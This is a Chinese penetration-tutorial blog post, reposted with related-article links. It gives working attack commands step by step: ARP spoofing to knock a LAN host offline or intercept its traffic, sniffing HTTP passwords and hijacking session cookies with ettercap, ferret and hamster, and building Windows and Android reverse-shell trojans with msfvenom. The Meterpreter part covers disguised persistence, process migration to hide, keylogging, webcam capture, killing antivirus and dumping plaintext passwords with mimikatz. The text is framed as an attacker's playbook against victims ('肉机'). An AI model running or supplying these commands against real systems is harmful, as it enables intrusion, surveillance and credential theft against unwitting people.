Web安全渗透
来源:互联网 发布:关键词优化在哪里 编辑:程序博客网 时间:2024/05/18 17:44
1. 局域网断网攻击
wins下
ipconfig
查看主机网络IP。
在vmware下
ifconfig
获取当前虚拟机网卡,可能是eth0
fping -asg 172.20.12.254/24
获取局域网网关中的所有主机,网关为172.20.12.254
arpspoof -i eth0(网卡) -t 192.168.1.10(目标主机的IP) 192.168.1.1(目标主机所在的网关)arpspoof -i eth0 -t 192.168.1.10 192.168.1.1#流量欺骗
这样就可以使得Ip为192.168.1.10,网关为192.168.1.1,无法连网。
原理:流量劫持
正常上网:上网—》网关—》外网
上网—》劫持机的网卡(所有的流量都经过我)—》不转发到外网,导致断网
2. 流量劫持,并转发到外网,这样可查看所有会话,中间人攻击
echo 1 >/proc/sys/net/ipv4/ip_forward #流量转发arpspoof -i eth0 -t 192.168.1.10 192.168.1.1#流量欺骗
工具:arpspoof –>流量欺骗
ctrl + shift + t,新打开一个终端,输入
driftnet -i eth0
可以查看图经过网卡所有的图片信息,这样就能查看 IP192.168.1.10所浏览的图片,但其仍然可以上网。
3. http账号密码获取
首先流量欺骗,
echo 1 >/proc/sys/net/ipv4/ip_forward #流量转发arpspoof -i eth0 -t 192.168.1.10 192.168.1.1#流量欺骗
其次,抓包。
ctrl + shift + t,新打开一个终端,输入
ettercap -Tq -i eth0
工具:ettercap抓取网络当中传送的数据包,-T代表文本模式,q代表安静模式。
这样就可以捕获到 IP192.168.1.10登陆到的所有http网页下的账号和密码。
4.局域网内Session会话劫持
Session,通俗的讲,浏览器 打开–》关闭这个期间是一个会话。
在同一个局域网当中,登录别人的百度贴吧等。
首先,流量转发,流量欺骗
echo 1 >/proc/sys/net/ipv4/ip_forward #流量转发arpspoof -i eth0 -t 192.168.1.10 192.168.1.1#流量欺骗
其次,捕获数据
ctrl + shift + t,新打开一个终端,输入
tcpdump -i eth0 -w test.cap
用来捕获数据。w写入,tcpdump抓去打到本地的数据包。
最后,解析数据
ctrl + shift + t,新打开一个终端,输入
ferret -r test.cap
下面需要设置浏览器的代理
Edit—》Preferences—》Advanced—>Network—>Connection—>Settings—>Manual proxy configuration
接着进入下一步,模拟受害者登陆
ctrl + shift + t,新打开一个终端,输入
hamster
再接着进入浏览器,输入 127.0.0.1:1234
就可以看到所有的cookies
点击cookies就可以模拟受害者登陆。
工具:用到的工具是arpspoof tcpdump ferret hamster。
arpspoof 进行ARP欺骗tcpdump抓去打到本地的数据包Ferret用来处理抓下来的数据包的Hamster跟ferret配合使用,提供一个web服务来让我们交互控制。
整个流程可见
开始arp欺骗命令:arpspoof -i eth0 -t 192.168.1.1 192.168.1.100捕获数据包命令:tcpdump -i eth0 -w cookie.cap模拟受害者登录受害者在受害机器上就随便刷新一下或者登录一下完毕下面我们开始重点处理抓去的数据包ferret -r cookie.cap自动生成了 hamster.txt记得设置浏览器代理:开启hamster服务打开hamster 浏览器输入http://127.0.0.1:1234
5.生成木门
攻击端:
OS:Kali
IP:192.168.1.104
被害端:
OS:Windows (64位)
IP:192.168.1.10
metaspolit framework
msf利器!
如何生成木门
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=55555 -f exe -o muma.exe
LHOST 为虚拟机的IP,LPORT为虚拟机的端口,我们是用虚拟机作为攻击机。
ctrl + shift +t , 重新打开一个端口
输入
msfconsole #控制台use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset LHOST 虚拟机IPset LPORT 55555 #55555为虚拟机端口exploit
下面开始寻找肉机,只要别人打开这个muma.exe,就会成功找到。
别人必须打开这个 .exe 文件?如何让别人打开?360 直接就能屏蔽?
监听键盘,输入的是汉语,监听输出的是英文,这是以为监听键盘仅仅只是监听键盘的输入字符。
帮助菜单
meterpreter > ?
转移 meterpreter到其他进程
(转移的目的是为了防止被攻击人查看进程管理器,杀死不明进程,一般转移到屏幕桌面进程explorer.exe,只要屏幕不关闭,metersploit进程就不关闭)
meterpreter > getuid // 查看当前权限meterpreter > ps // 列出当前权限
将木马文件test.exe 的进程pid迁移到 PID为2044的explorer的进程
meterpreter > migrate 2044
验证
meterpreter > ps
查看可知,test.exe进程已经没有了。需要注意的是如果存在杀软的话可能会阻止进程注入
安装后门 metsvc
(安装后门的目的是为了进行开机自启动,修改注册表之类的,让木马能长久的存活,一般把木马test.exe 文件 改成qqconfig.exe之类的伪装名,肉机就不敢删除。)
meterpreter > run metsvc
metsvc后门安装成功,接下来是连接
ctrl + shift +t , 重新打开一个端口
msfconsolemsf > use multi/handlermsf exploit(handler) > set payload windows/metsvc_bind_tcpmsf exploit(handler) > show optionsmsf exploit(handler) > set RHOST 192.168.1.10msf exploit(handler) > set LPORT 31337msf exploit(handler) > exploit
其中 RHOST 为肉机的IP, 端口设置为metsvc所创建的端口
查看肉机的系统
meterpreter > sysinfo
获取作为运行服务器的用户
getuid
尽可能获取尽可能多的特权
getprivs
获得系统管理员权限
getsystem
获取目标主机的图形界面(VNC)
meterpreter > run vnc
查看屏幕
meterpreter > keyscan_start #启动时与如 Word 或浏览器的进程相关联的键盘记录软件meterpreter > keyscan_dump #键盘记录软件的内容转储meterpreter >keyscan_stop #停止键盘记录软件
抓去 meterpreter 桌面的屏幕截图
screenshot
控制摄像头
meterpreter > webcam_stream
控制鼠标
uictl -启用用户界面组件的一些控件
meterpreter > uictl disable mouse #鼠标失效meterpreter > uictl enable mouse #
查看当前进程
ps
重新打开连接
meterpreter > rerun
查看目标主机都采用了那些防护措施,列出帮助菜单,关闭防火墙以及其它我们发现的防护措施:
meterpreter >run getcountermeasuremeterpreter >run getcountermeasuer -hmeterpreter >run getcountermeasuer -d -k
killav脚本来杀死目标主机运行的杀毒软件
meterpreter > run killav
识别被控制的主机是否是一台虚拟机
meterpreter >run checkvm
在一个meterpreter会话界面中使用cmd shell
meterpreter >shell
获取密码
法国神器mimikatz可以直接获得操作系统的明文密码,meterpreter添加了这个模块。
首先加载mimikatz模块。
由于我的Windows 2008是64位的,所以先要转移到64位进程。
meterpreter > psmeterpreter > migrate 2780
pid 2780 为64位进程 winlogon.exe
meterpreter > load mimikatz
获取密码哈希
meterpreter > msv
获取明文密码
meterpreter > kerberos
参考主页
https://www.91ri.org/8625.html
https://www.91ri.org/9018.html
待学习的网页
https://www.91ri.org/8879.html
https://www.91ri.org/9548.html
https://www.91ri.org/9560.html
https://www.91ri.org/11060.html
https://www.91ri.org/7170.html
https://www.91ri.org/12488.html
https://www.91ri.org/6843.html
6.渗透安卓 Android
生成木马
msfvenom -p android/meterpreter/reverse_tcp LHOST=虚拟机IP LPORT= 55555 R > test.apk
ctrl + shift + t 打开另外一个终端
msfconsoleuse exploit/multi/handlerset payload android/meterpreter/reverse_tcpset LHOST 虚拟机IPset LPORT 55555exploit
更多细节可查看
http://www.myexception.cn/android/2023190.html
7.继续
- Web安全渗透自学
- Web安全渗透
- 企业级Web安全渗透测试之SSL篇
- 详述SSL和TLS的Web安全渗透测试
- 【安全牛学习笔记】Kali实战-Web渗透
- 华盟Web安全与渗透第十七课安全测试中的奇技淫巧贰 PPT及视频下载
- 安全渗透 by80
- 安全测试-渗透测试
- 安全渗透测试网站
- 安全渗透测试案例
- 安全渗透1
- 开始学习web安全 & 搭建 Damn Vulnerable Web App 渗透测试平台
- WEB渗透技术流程
- web渗透思路
- web渗透入门
- web渗透入门
- 渗透攻防Web篇
- Web渗透学习路线
- 逆序输出单个数字
- 我相信,终有一天,我会变成自己喜欢的模样
- [LightOJ 1274] Beating the Dataset (期望DP)
- listagg小记录
- win32 Socket网络编程连接
- Web安全渗透
- Android加载动画系列——WifiLoadingAnim
- 指针强制转换
- 【Linux】可重入函数和线程安全的区别与联系
- LINUX集群搭建必备:nat模式设置静态ip,达到上网与主机相互通信
- 设计资源库
- 跟着我左手右手一个慢动作,轻松提交AppStore(AppStore提交App流程最新超详细攻略)(领证篇)
- NN远程教育平台,一键安装,网址无缝对接
- Timus 1104. Don’t Ask Woman about Her Age